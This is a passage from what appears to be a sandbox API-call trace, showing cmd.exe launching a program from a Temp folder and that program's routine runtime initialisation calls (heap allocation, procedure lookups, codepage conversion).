_String2="ENDLOCAL") returned 15 [0195.049] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0195.049] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0195.049] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0195.049] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0195.049] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0195.049] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0195.049] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0195.049] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0195.049] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0195.049] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0195.049] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0195.049] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0195.050] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0195.050] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0195.050] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0195.050] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0195.050] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0195.050] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0195.050] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0195.050] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0195.050] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0195.050] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0195.050] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0195.050] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0195.050] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0195.050] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0195.050] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0195.050] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0195.050] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0195.051] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0195.051] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0195.051] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0195.051] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0195.051] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0195.051] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0195.051] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0195.051] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0195.051] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0195.051] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0195.051] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0195.051] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0195.051] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0195.051] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0195.051] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0195.052] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0195.052] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0195.052] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0195.052] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0195.052] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0195.052] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0195.052] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0195.052] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0195.052] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0195.052] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0195.052] _wcsicmp (_String1="tdq963ii.exe", _String2="FOR") returned 14 [0195.052] _wcsicmp (_String1="tdq963ii.exe", _String2="IF") returned 11 [0195.052] _wcsicmp (_String1="tdq963ii.exe", _String2="REM") returned 2 [0195.054] GetProcessHeap () returned 0x470000 [0195.054] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x210) returned 0x484678 [0195.054] GetProcessHeap () returned 0x470000 [0195.054] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x68) returned 0x484890 [0195.054] _wcsnicmp (_String1="tdq9", _String2="cmd ", _MaxCount=0x4) returned 17 [0195.054] GetProcessHeap () returned 0x470000 [0195.055] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x418) returned 0x484900 [0195.055] SetErrorMode (uMode=0x0) returned 0x0 [0195.055] SetErrorMode (uMode=0x1) returned 0x0 [0195.055] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x484908, lpFilePart=0x38efd0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x38efd0*="Desktop") returned 0x25 [0195.055] SetErrorMode (uMode=0x0) returned 0x1 [0195.055] GetProcessHeap () returned 0x470000 [0195.055] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x484900, Size=0x6e) returned 0x484900 [0195.055] GetProcessHeap () returned 0x470000 [0195.056] RtlSizeHeap (HeapHandle=0x470000, Flags=0x0, MemoryPointer=0x484900) returned 0x6e [0195.056] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0195.056] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0195.056] GetProcessHeap () returned 0x470000 [0195.056] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x120) returned 0x484978 [0195.056] GetProcessHeap () returned 0x470000 [0195.056] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x238) returned 0x484aa0 [0195.071] GetConsoleTitleW (in: lpConsoleTitle=0x38f244, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0195.785] InitializeProcThreadAttributeList (in: lpAttributeList=0x38f0cc, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x38f194 | out: lpAttributeList=0x38f0cc, lpSize=0x38f194) returned 1 [0195.785] UpdateProcThreadAttribute (in: lpAttributeList=0x38f0cc, dwFlags=0x0, Attribute=0x60001, lpValue=0x38f18c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x38f0cc, lpPreviousValue=0x0) returned 1 [0195.785] GetStartupInfoW (in: lpStartupInfo=0x38f088 | out: lpStartupInfo=0x38f088*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x3, hStdOutput=0x80, hStdError=0xb)) [0195.802] CloseHandle (hObject=0x74) returned 1 [0195.802] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0195.803] GetProcessHeap () returned 0x470000 [0195.803] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x482c40 | out: hHeap=0x470000) returned 1 [0195.803] GetEnvironmentStringsW () returned 0x482c40* [0195.803] GetProcessHeap () returned 0x470000 [0195.803] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xb7a) returned 0x487330 [0195.803] FreeEnvironmentStringsW (penv=0x482c40) returned 1 [0195.803] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0202.533] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x38f068 | out: lpExitCode=0x38f068*=0x1) returned 1 [0202.533] CloseHandle (hObject=0x78) returned 1 [0202.533] _vsnwprintf (in: _Buffer=0x38f1b0, _BufferCount=0x13, _Format="%08X", _ArgList=0x38f074 | out: _Buffer="00000001") returned 8 [0202.534] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0202.534] GetProcessHeap () returned 0x470000 [0202.534] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x487330 | out: hHeap=0x470000) returned 1 [0202.534] GetEnvironmentStringsW () returned 0x482c40* [0202.534] GetProcessHeap () returned 0x470000 [0202.534] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xb7a) returned 0x487330 [0202.534] FreeEnvironmentStringsW (penv=0x482c40) returned 1 [0202.534] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0202.534] GetProcessHeap () returned 0x470000 [0202.534] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x487330 | out: hHeap=0x470000) returned 1 [0202.534] GetEnvironmentStringsW () returned 0x482c40* [0202.535] GetProcessHeap () returned 0x470000 [0202.535] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xb7a) returned 0x487330 [0202.535] FreeEnvironmentStringsW (penv=0x482c40) returned 1 [0202.535] GetProcessHeap () returned 0x470000 [0202.535] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4800a8 | out: hHeap=0x470000) returned 1 [0202.535] DeleteProcThreadAttributeList (in: lpAttributeList=0x38f0cc | out: lpAttributeList=0x38f0cc) [0202.535] _get_osfhandle (_FileHandle=1) returned 0x80 [0202.535] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0202.535] _get_osfhandle (_FileHandle=1) returned 0x80 [0202.536] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0202.536] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.536] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0202.536] SetConsoleInputExeNameW () returned 0x1 [0202.536] GetConsoleOutputCP () returned 0x1b5 [0202.537] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0202.537] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.537] exit (_Code=1) Process: id = "191" image_name = "tdq963ii64.exe" filename = "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe" page_root = "0x2d4db000" os_pid = "0xa24" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "181" os_parent_pid = "0x3f8" cmd_line = "tdq963ii.exe -accepteula \"Workflow.Targets\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 736 os_tid = 0xa30 [0195.027] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff38 | out: lpSystemTimeAsFileTime=0x12ff38*(dwLowDateTime=0x2d5131a0, dwHighDateTime=0x1d68287)) [0195.027] GetCurrentThreadId () returned 0xa30 [0195.027] GetCurrentProcessId () returned 0xa24 [0195.027] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff40 | out: lpPerformanceCount=0x12ff40*=31609617638) returned 1 [0195.758] GetProcessHeap () returned 0x320000 [0195.759] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77940000 [0195.759] GetProcAddress (hModule=0x77940000, lpProcName="FlsAlloc") returned 0x77957190 [0195.760] GetProcAddress (hModule=0x77940000, lpProcName="FlsFree") returned 0x779515b0 [0195.760] GetProcAddress (hModule=0x77940000, lpProcName="FlsGetValue") returned 0x77963520 [0195.760] GetProcAddress (hModule=0x77940000, lpProcName="FlsSetValue") returned 0x7795bd90 [0195.760] GetProcAddress (hModule=0x77940000, lpProcName="InitializeCriticalSectionEx") returned 0x779579b0 [0195.761] GetProcAddress (hModule=0x77940000, lpProcName="CreateEventExW") returned 0x7798c590 [0195.761] GetProcAddress (hModule=0x77940000, lpProcName="CreateSemaphoreExW") returned 0x7798c4c0 [0195.761] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadStackGuarantee") returned 0x77948050 [0195.761] GetProcAddress (hModule=0x77940000, lpProcName="CreateThreadpoolTimer") returned 0x77948820 [0195.761] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadpoolTimer") returned 0x77a7b2f0 [0195.762] GetProcAddress (hModule=0x77940000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77a6d8c0 [0195.762] GetProcAddress (hModule=0x77940000, lpProcName="CloseThreadpoolTimer") returned 0x77a6d620 [0195.762] GetProcAddress (hModule=0x77940000, lpProcName="CreateThreadpoolWait") returned 0x7798ba80 [0195.762] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadpoolWait") returned 0x77a7e170 [0195.762] GetProcAddress (hModule=0x77940000, lpProcName="CloseThreadpoolWait") returned 0x77a6c540 [0195.763] GetProcAddress (hModule=0x77940000, lpProcName="FlushProcessWriteBuffers") returned 0x77ab1f80 [0195.763] GetProcAddress (hModule=0x77940000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77b2ec60 [0195.763] GetProcAddress (hModule=0x77940000, lpProcName="GetCurrentProcessorNumber") returned 0x77ab0040 [0195.763] GetProcAddress (hModule=0x77940000, lpProcName="GetLogicalProcessorInformation") returned 0x7798b820 [0195.763] GetProcAddress (hModule=0x77940000, lpProcName="CreateSymbolicLinkW") returned 0x779b5ad0 [0195.764] GetProcAddress (hModule=0x77940000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0195.764] GetProcAddress (hModule=0x77940000, lpProcName="EnumSystemLocalesEx") returned 0x7798c3d0 [0195.764] GetProcAddress (hModule=0x77940000, lpProcName="CompareStringEx") returned 0x7798b980 [0195.764] GetProcAddress (hModule=0x77940000, lpProcName="GetDateFormatEx") returned 0x779d0920 [0195.764] GetProcAddress (hModule=0x77940000, lpProcName="GetLocaleInfoEx") returned 0x77943c10 [0195.764] GetProcAddress (hModule=0x77940000, lpProcName="GetTimeFormatEx") returned 0x779cd4e0 [0195.764] GetProcAddress (hModule=0x77940000, lpProcName="GetUserDefaultLocaleName") returned 0x7798b790 [0195.764] GetProcAddress (hModule=0x77940000, lpProcName="IsValidLocaleName") returned 0x7798b770 [0195.765] GetProcAddress (hModule=0x77940000, lpProcName="LCMapStringEx") returned 0x7798b710 [0195.765] GetProcAddress (hModule=0x77940000, lpProcName="GetCurrentPackageId") returned 0x0 [0195.765] GetProcAddress (hModule=0x77940000, lpProcName="GetTickCount64") returned 0x77949450 [0195.765] GetProcAddress (hModule=0x77940000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0195.765] GetProcAddress (hModule=0x77940000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0195.766] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x478) returned 0x33f050 [0195.766] GetCurrentThreadId () returned 0xa30 [0195.766] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x28) returned 0x335ed0 [0195.767] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0xb00) returned 0x33f4d0 [0195.767] GetStartupInfoW (in: lpStartupInfo=0x12fe90 | out: lpStartupInfo=0x12fe90*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x14000c2d0, hStdError=0x33f050)) [0195.767] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0195.767] GetFileType (hFile=0x3) returned 0x2 [0195.768] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4 [0195.768] GetFileType (hFile=0x4) returned 0x3 [0195.768] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0195.768] GetFileType (hFile=0xb) returned 0x2 [0195.769] GetCommandLineW () returned="tdq963ii.exe -accepteula \"Workflow.Targets\" -nobanner" [0195.769] GetEnvironmentStringsW () returned 0x33ffe0* [0195.769] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0xb3a) returned 0x340b30 [0195.769] FreeEnvironmentStringsW (penv=0x33ffe0) returned 1 [0195.769] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14002c980, nSize=0x104 | out: lpFilename="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe")) returned 0x33 [0195.770] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x90) returned 0x341680 [0195.770] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x138) returned 0x341720 [0195.770] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x3e) returned 0x336510 [0195.770] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x6c) returned 0x341860 [0195.770] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x62) returned 0x3418e0 [0195.770] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x78) returned 0x341950 [0195.770] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x62) returned 0x3419d0 [0195.770] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x2e) returned 0x33de00 [0195.770] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x48) returned 0x336560 [0195.770] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x2c) returned 0x33de40 [0195.770] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x28) returned 0x335f00 [0195.770] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x1a) returned 0x335f30 [0195.770] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x4a) returned 0x341a40 [0195.770] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x72) returned 0x341aa0 [0195.771] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x30) returned 0x33de80 [0195.771] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x2e) returned 0x33dec0 [0195.771] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x1c) returned 0x335f60 [0195.771] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0xd2) returned 0x341b20 [0195.771] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x7c) returned 0x341c00 [0195.771] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x3a) returned 0x3365b0 [0195.771] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x90) returned 0x341c90 [0195.771] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x24) returned 0x335f90 [0195.771] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x30) returned 0x33df00 [0195.771] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x36) returned 0x33df40 [0195.771] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x3c) returned 0x336600 [0195.771] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x52) returned 0x341d30 [0195.771] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x3c) returned 0x336650 [0195.772] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x18) returned 0x341d90 [0195.772] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x82) returned 0x341db0 [0195.772] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x2e) returned 0x33df80 [0195.772] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x1e) returned 0x335fc0 [0195.772] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x2c) returned 0x33dfc0 [0195.772] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x54) returned 0x341e40 [0195.772] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x52) returned 0x341ea0 [0195.772] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x2a) returned 0x33e000 [0195.772] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x3c) returned 0x3366a0 [0195.772] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x54) returned 0x341f00 [0195.772] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x24) returned 0x335ff0 [0195.772] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x30) returned 0x33e040 [0195.772] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x8c) returned 0x33ffe0 [0195.773] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x340b30 | out: hHeap=0x320000) returned 1 [0195.774] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x1000) returned 0x340080 [0195.774] GetLastError () returned 0x0 [0195.774] SetLastError (dwErrCode=0x0) [0195.774] GetLastError () returned 0x0 [0195.774] SetLastError (dwErrCode=0x0) [0195.775] GetLastError () returned 0x0 [0195.775] SetLastError (dwErrCode=0x0) [0195.775] GetACP () returned 0x4e4 [0195.775] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x228) returned 0x341090 [0195.775] GetLastError () returned 0x0 [0195.775] SetLastError (dwErrCode=0x0) [0195.775] IsValidCodePage (CodePage=0x4e4) returned 1 [0195.775] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fe00 | out: lpCPInfo=0x12fe00) returned 1 [0195.775] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f8a0 | out: lpCPInfo=0x12f8a0) returned 1 [0195.775] GetLastError () returned 0x0 [0195.775] SetLastError (dwErrCode=0x0) [0195.776] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f8c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0195.776] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f8c0, cbMultiByte=256, lpWideCharStr=0x12f5a0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䗂煅﹦") returned 256 [0195.776] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䗂煅﹦", cchSrc=256, lpCharType=0x12fbc0 | out: lpCharType=0x12fbc0) returned 1 [0195.776] GetLastError () returned 0x0 [0195.776] SetLastError (dwErrCode=0x0) [0195.776] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f8c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0195.776] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f8c0, cbMultiByte=256, lpWideCharStr=0x12f590, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0195.776] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0195.777] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x12f380, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ 